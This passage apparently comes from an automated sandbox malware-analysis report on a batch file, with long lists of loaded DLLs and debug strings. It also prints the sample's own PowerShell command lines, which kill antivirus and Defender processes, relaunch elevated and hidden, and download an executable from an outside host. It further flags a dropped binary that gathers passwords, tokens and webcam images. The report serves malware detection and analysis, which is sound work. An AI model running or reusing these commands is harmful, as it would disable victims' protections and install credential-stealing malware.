        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\explorer.exeSection loaded: aepic.dll
        Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
        Source: C:\Windows\explorer.exeSection loaded: userenv.dll
        Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: propsys.dll
        Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
        Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
        Source: C:\Windows\explorer.exeSection loaded: wininet.dll
        Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
        Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
        Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
        Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
        Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
        Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
        Source: C:\Windows\explorer.exeSection loaded: netutils.dll
        Source: C:\Windows\explorer.exeSection loaded: wldp.dll
        Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
        Source: C:\Windows\explorer.exeSection loaded: ninput.dll
        Source: C:\Windows\explorer.exeSection loaded: appresolver.dll
        Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\explorer.exeSection loaded: slc.dll
        Source: C:\Windows\explorer.exeSection loaded: sppc.dll
        Source: C:\Windows\explorer.exeSection loaded: profapi.dll
        Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\explorer.exeSection loaded: starttiledata.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dll
        Source: C:\Windows\explorer.exeSection loaded: idstore.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.applicationmodel.dll
        Source: C:\Windows\explorer.exeSection loaded: appxdeploymentclient.dll
        Source: C:\Windows\explorer.exeSection loaded: wlidprov.dll
        Source: C:\Windows\explorer.exeSection loaded: samcli.dll
        Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dll
        Source: C:\Windows\explorer.exeSection loaded: policymanager.dll
        Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.dll
        Source: C:\Windows\explorer.exeSection loaded: winsta.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryclient.dll
        Source: C:\Windows\explorer.exeSection loaded: sndvolsso.dll
        Source: C:\Windows\explorer.exeSection loaded: mmdevapi.dll
        Source: C:\Windows\explorer.exeSection loaded: devobj.dll
        Source: C:\Windows\explorer.exeSection loaded: oleacc.dll
        Source: C:\Windows\explorer.exeSection loaded: wintypes.dll
        Source: C:\Windows\explorer.exeSection loaded: textshaping.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.ui.dll
        Source: C:\Windows\explorer.exeSection loaded: windowmanagementapi.dll
        Source: C:\Windows\explorer.exeSection loaded: textinputframework.dll
        Source: C:\Windows\explorer.exeSection loaded: inputhost.dll
        Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dll
        Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dll
        Source: C:\Windows\explorer.exeSection loaded: windowscodecs.dll
        Source: C:\Windows\explorer.exeSection loaded: dcomp.dll
        Source: C:\Windows\explorer.exeSection loaded: d3d11.dll
        Source: C:\Windows\explorer.exeSection loaded: appextension.dll
        Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dll
        Source: C:\Windows\explorer.exeSection loaded: d3d10warp.dll
        Source: C:\Windows\explorer.exeSection loaded: dxcore.dll
        Source: C:\Windows\explorer.exeSection loaded: d2d1.dll
        Source: C:\Windows\explorer.exeSection loaded: dwrite.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dll
        Source: C:\Windows\explorer.exeSection loaded: xmllite.dll
        Source: C:\Windows\explorer.exeSection loaded: cldapi.dll
        Source: C:\Windows\explorer.exeSection loaded: fltlib.dll
        Source: C:\Windows\explorer.exeSection loaded: dataexchange.dll
        Source: C:\Windows\explorer.exeSection loaded: apphelp.dll
        Source: C:\Windows\explorer.exeSection loaded: tiledatarepository.dll
        Source: C:\Windows\explorer.exeSection loaded: staterepository.core.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.staterepository.dll
        Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
        Source: C:\Windows\explorer.exeSection loaded: twinui.pcshell.dll
        Source: C:\Windows\explorer.exeSection loaded: wkscli.dll
        Source: C:\Windows\explorer.exeSection loaded: wincorlib.dll
        Source: C:\Windows\explorer.exeSection loaded: cdp.dll
        Source: C:\Windows\explorer.exeSection loaded: dsreg.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.immersiveshell.serviceprovider.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorycore.dll
        Source: C:\Windows\explorer.exeSection loaded: mrmcorer.dll
        Source: C:\Windows\explorer.exeSection loaded: languageoverlayutil.dll
        Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dll
        Source: C:\Windows\explorer.exeSection loaded: thumbcache.dll
        Source: C:\Windows\explorer.exeSection loaded: edputil.dll
        Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\explorer.exeSection loaded: twinui.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: twinui.dll
        Source: C:\Windows\explorer.exeSection loaded: pdh.dll
        Source: C:\Windows\explorer.exeSection loaded: applicationframe.dll
        Source: C:\Windows\explorer.exeSection loaded: photometadatahandler.dll
        Source: C:\Windows\explorer.exeSection loaded: ntshrui.dll
        Source: C:\Windows\explorer.exeSection loaded: rmclient.dll
        Source: C:\Windows\explorer.exeSection loaded: cscapi.dll
        Source: C:\Windows\explorer.exeSection loaded: linkinfo.dll
        Source: C:\Windows\explorer.exeSection loaded: ehstorshell.dll
        Source: C:\Windows\explorer.exeSection loaded: cscui.dll
        Source: C:\Windows\explorer.exeSection loaded: provsvc.dll
        Source: C:\Windows\explorer.exeSection loaded: holographicextensions.dll
        Source: C:\Windows\explorer.exeSection loaded: virtualmonitormanager.dll
        Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.ui.immersive.dll
        Source: C:\Windows\explorer.exeSection loaded: abovelockapphost.dll
        Source: C:\Windows\explorer.exeSection loaded: npsm.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.web.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.shell.bluelightreduction.dll
        Source: C:\Windows\explorer.exeSection loaded: mscms.dll
        Source: C:\Windows\explorer.exeSection loaded: coloradapterclient.dll
        Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.internal.signals.dll
        Source: C:\Windows\explorer.exeSection loaded: tdh.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorybroker.dll
        Source: C:\Windows\explorer.exeSection loaded: mfplat.dll
        Source: C:\Windows\explorer.exeSection loaded: rtworkq.dll
        Source: C:\Windows\explorer.exeSection loaded: taskflowdataengine.dll
        Source: C:\Windows\explorer.exeSection loaded: actxprxy.dll
        Source: C:\Windows\explorer.exeSection loaded: structuredquery.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.system.launcher.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.security.authentication.web.core.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.shell.servicehostbuilder.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.data.activities.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.internal.ui.shell.windowtabmanager.dll
        Source: C:\Windows\explorer.exeSection loaded: notificationcontrollerps.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.devices.enumeration.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dll
        Source: C:\Windows\explorer.exeSection loaded: icu.dll
        Source: C:\Windows\explorer.exeSection loaded: mswb7.dll
        Source: C:\Windows\explorer.exeSection loaded: devdispitemprovider.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.networking.connectivity.dll
        Source: C:\Windows\explorer.exeSection loaded: uianimation.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.ui.core.textinput.dll
        Source: C:\Windows\explorer.exeSection loaded: windowsudk.shellcommon.dll
        Source: C:\Windows\explorer.exeSection loaded: dictationmanager.dll
        Source: C:\Windows\explorer.exeSection loaded: npmproxy.dll
        Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
        Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
        Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
        Source: C:\Windows\explorer.exeSection loaded: winnsi.dll
        Source: C:\Windows\explorer.exeSection loaded: dpapi.dll
        Source: C:\Windows\explorer.exeSection loaded: msasn1.dll
        Source: C:\Windows\explorer.exeSection loaded: rsaenh.dll
        Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
        Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\explorer.exeSection loaded: schannel.dll
        Source: C:\Windows\explorer.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\explorer.exeSection loaded: ntasn1.dll
        Source: C:\Windows\explorer.exeSection loaded: ncrypt.dll
        Source: C:\Windows\explorer.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\explorer.exeSection loaded: gpapi.dll
        Source: C:\Windows\explorer.exeSection loaded: pcshellcommonproxystub.dll
        Source: C:\Windows\explorer.exeSection loaded: cryptngc.dll
        Source: C:\Windows\explorer.exeSection loaded: cflapi.dll
        Source: C:\Windows\explorer.exeSection loaded: execmodelproxy.dll
        Source: C:\Windows\explorer.exeSection loaded: daxexec.dll
        Source: C:\Windows\explorer.exeSection loaded: container.dll
        Source: C:\Windows\explorer.exeSection loaded: shellcommoncommonproxystub.dll
        Source: C:\Windows\explorer.exeSection loaded: uiautomationcore.dll
        Source: C:\Windows\explorer.exeSection loaded: stobject.dll
        Source: C:\Windows\explorer.exeSection loaded: wmiclnt.dll
        Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.fileexplorer.common.dll
        Source: C:\Windows\explorer.exeSection loaded: samlib.dll
        Source: C:\Windows\explorer.exeSection loaded: batmeter.dll
        Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dll
        Source: C:\Windows\explorer.exeSection loaded: sxs.dll
        Source: C:\Windows\explorer.exeSection loaded: inputswitch.dll
        Source: C:\Windows\explorer.exeSection loaded: es.dll
        Source: C:\Windows\explorer.exeSection loaded: prnfldr.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.ui.shell.dll
        Source: C:\Windows\explorer.exeSection loaded: wpnclient.dll
        Source: C:\Windows\explorer.exeSection loaded: dxp.dll
        Source: C:\Windows\explorer.exeSection loaded: shdocvw.dll
        Source: C:\Windows\explorer.exeSection loaded: syncreg.dll
        Source: C:\Windows\explorer.exeSection loaded: atlthunk.dll
        Source: C:\Windows\explorer.exeSection loaded: actioncenter.dll
        Source: C:\Windows\explorer.exeSection loaded: wevtapi.dll
        Source: C:\Windows\explorer.exeSection loaded: audioses.dll
        Source: C:\Windows\explorer.exeSection loaded: pnidui.dll
        Source: C:\Windows\explorer.exeSection loaded: mobilenetworking.dll
        Source: C:\Windows\explorer.exeSection loaded: netprofm.dll
        Source: C:\Windows\explorer.exeSection loaded: wscinterop.dll
        Source: C:\Windows\explorer.exeSection loaded: wscapi.dll
        Source: C:\Windows\explorer.exeSection loaded: networkuxbroker.dll
        Source: C:\Windows\explorer.exeSection loaded: ethernetmediamanager.dll
        Source: C:\Windows\explorer.exeSection loaded: werconcpl.dll
        Source: C:\Windows\explorer.exeSection loaded: framedynos.dll
        Source: C:\Windows\explorer.exeSection loaded: wer.dll
        Source: C:\Windows\explorer.exeSection loaded: hcproviders.dll
        Source: C:\Windows\explorer.exeSection loaded: dusmapi.dll
        Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000014.00000002.2132008073.00000224BB954000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: softy.pdb9 source: powershell.exe, 00000023.00000002.2656267224.000002D2E052C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb{ source: powershell.exe, 00000014.00000002.2136799854.00000224BBAF0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: tomation.pdb source: powershell.exe, 00000009.00000002.1493577612.000002699181D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1524477975.00000269AB862000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1526310397.00000269ABB8D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2132008073.00000224BB8AE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000023.00000002.2673504080.000002D2E06EA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mscorlib.pdb source: powershell.exe, 00000014.00000002.2132008073.00000224BB880000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2656267224.000002D2E052C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: n.pdb source: powershell.exe, 00000009.00000002.1526310397.00000269ABB99000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbu38 source: powershell.exe, 00000014.00000002.2132008073.00000224BB954000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32( source: powershell.exe, 00000014.00000002.1953599209.00000224A1939000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: 6?ll\mscorlib.pdb source: powershell.exe, 00000023.00000002.2656267224.000002D2E052C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: softy.pdb3 source: powershell.exe, 00000023.00000002.2656267224.000002D2E052C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1526310397.00000269ABB70000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.pdb source: powershell.exe, 00000009.00000002.1496227351.0000026994FB9000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.pdbhPM source: powershell.exe, 00000009.00000002.1496227351.0000026994FB9000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: ion.pdb source: powershell.exe, 00000009.00000002.1524477975.00000269AB862000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbQ*V source: powershell.exe, 00000023.00000002.2656267224.000002D2E052C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.pdbneAutomation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dllmands.Utility.dllt.dll source: powershell.exe, 00000009.00000002.1493577612.000002699181D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: em.Core.pdbk source: powershell.exe, 00000009.00000002.1526310397.00000269ABB70000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: em.Core.pdb source: powershell.exe, 00000009.00000002.1526310397.00000269ABB70000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdbi source: powershell.exe, 00000009.00000002.1524477975.00000269AB862000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ion.pdb71 source: powershell.exe, 00000009.00000002.1526310397.00000269ABB70000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: *on.pdb source: powershell.exe, 00000009.00000002.1524477975.00000269AB862000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        .NET source code contains potential unpacker
        Source: exe.exe.32.dr, Program.cs.Net Code: LoadDll System.Reflection.Assembly.Load(byte[])
        Source: exe.exe.32.dr, Program.cs.Net Code: password
        Source: exe.exe.32.dr, Program.cs.Net Code: webcampic
        Source: exe.exe.32.dr, Program.cs.Net Code: select_cam
        Source: exe.exe.32.dr, Program.cs.Net Code: get_cams
        Source: exe.exe.32.dr, Program.cs.Net Code: get_tokens
        Obfuscated command line found
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$s='taskkill /F /IM'; $p=@('m'+'bam.exe','mbam'+'service.exe','avast'+'svc.exe','avast'+'ui.exe','a'+'vp.exe','avg'+'ui.exe','bd'+'agent.exe','bddownloader.exe','bdre'+'dline.exe','bd'+'ss.exe','bdserv'+'icehost.exe','bdnagent.exe','bds'+'can.exe','bdc'+'ore.exe'); foreach($i in $p){iex \"$s \"$i\"\"};"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$s='taskkill /F /IM'; $p=@('m'+'bam.exe','mbam'+'service.exe','avast'+'svc.exe','avast'+'ui.exe','a'+'vp.exe','avg'+'ui.exe','bd'+'agent.exe','bddownloader.exe','bdre'+'dline.exe','bd'+'ss.exe','bdserv'+'icehost.exe','bdnagent.exe','bds'+'can.exe','bdc'+'ore.exe'); foreach($i in $p){iex \"$s \"$i\"\"};"Jump to behavior
        Suspicious powershell command line found
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent()); if (-not $currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { Start-Process -FilePath 'cmd.exe' -ArgumentList '/c C:\Users\user\Desktop\main.bat.bin.bat' -Verb RunAs -WindowStyle Hidden; exit }; $process = Get-Process -Id $PID; $process.PriorityClass = 'High'; $process.ProcessorAffinity = 1; $process.PriorityBoostEnabled = $true"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Stop-Process -Name MSASCui -Force -ErrorAction SilentlyContinue"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$processes = @('mbam', 'mbamservice', 'avastsvc', 'avastui', 'avp', 'avgui', 'bdagent', 'bddownloader', 'bdredline', 'bdss', 'bdservicehost', 'bdnagent', 'bdscan', 'bdcore'); foreach ($p in $processes) { Stop-Process -Name $p -Force -ErrorAction SilentlyContinue }"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Stop-Process -Name explorer -Force -ErrorAction SilentlyContinue"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent()); if (-not $currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { Start-Process -FilePath 'cmd.exe' -ArgumentList '/c C:\Users\user\Desktop\main.bat.bin.bat' -Verb RunAs -WindowStyle Hidden; exit }; $process = Get-Process -Id $PID; $process.PriorityClass = 'High'; $process.ProcessorAffinity = 1; $process.PriorityBoostEnabled = $true" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$processes = @('mbam', 'mbamservice', 'avastsvc', 'avastui', 'avp', 'avgui', 'bdagent', 'bddownloader', 'bdredline', 'bdss', 'bdservicehost', 'bdnagent', 'bdscan', 'bdcore'); foreach ($p in $processes) { Stop-Process -Name $p -Force -ErrorAction SilentlyContinue }"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Stop-Process -Name explorer -Force -ErrorAction SilentlyContinue"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')"Jump to behavior
        Source: exe.exe.32.drStatic PE information: 0xD6D709DC [Mon Mar 20 18:56:28 2084 UTC]
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFB4B2900BD pushad ; iretd 9_2_00007FFB4B2900C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFB4B282325 push eax; iretd 12_2_00007FFB4B28233D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFB4B2C09AD push ss; ret 21_2_00007FFB4B2C09C6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFB4E7F0790 push E958E01Ch; ret 35_2_00007FFB4E7F0909
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFB4E7F752B push ebx; iretd 35_2_00007FFB4E7F756A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFB4E7FBAE0 push eax; retf 35_2_00007FFB4E7FBBD3
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFB4E7FBBE4 push eax; retf 35_2_00007FFB4E7FBBD3
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFB4E7F08BD push E958E01Ch; ret 35_2_00007FFB4E7F0909
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFB4E7F090A push E958E01Ch; ret 35_2_00007FFB4E7F0909
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFB4E7F9258 push E8FFFFFFh; iretd 35_2_00007FFB4E7F925D

        Persistence and Installation Behavior

        barindex
        Tries to download and execute files (via powershell)
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Documents\Secret Document\exe.exeJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.dllJump to dropped file

        Hooking and other Techniques for Hiding and Protection

        barindex
        Loading BitLocker PowerShell Module
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
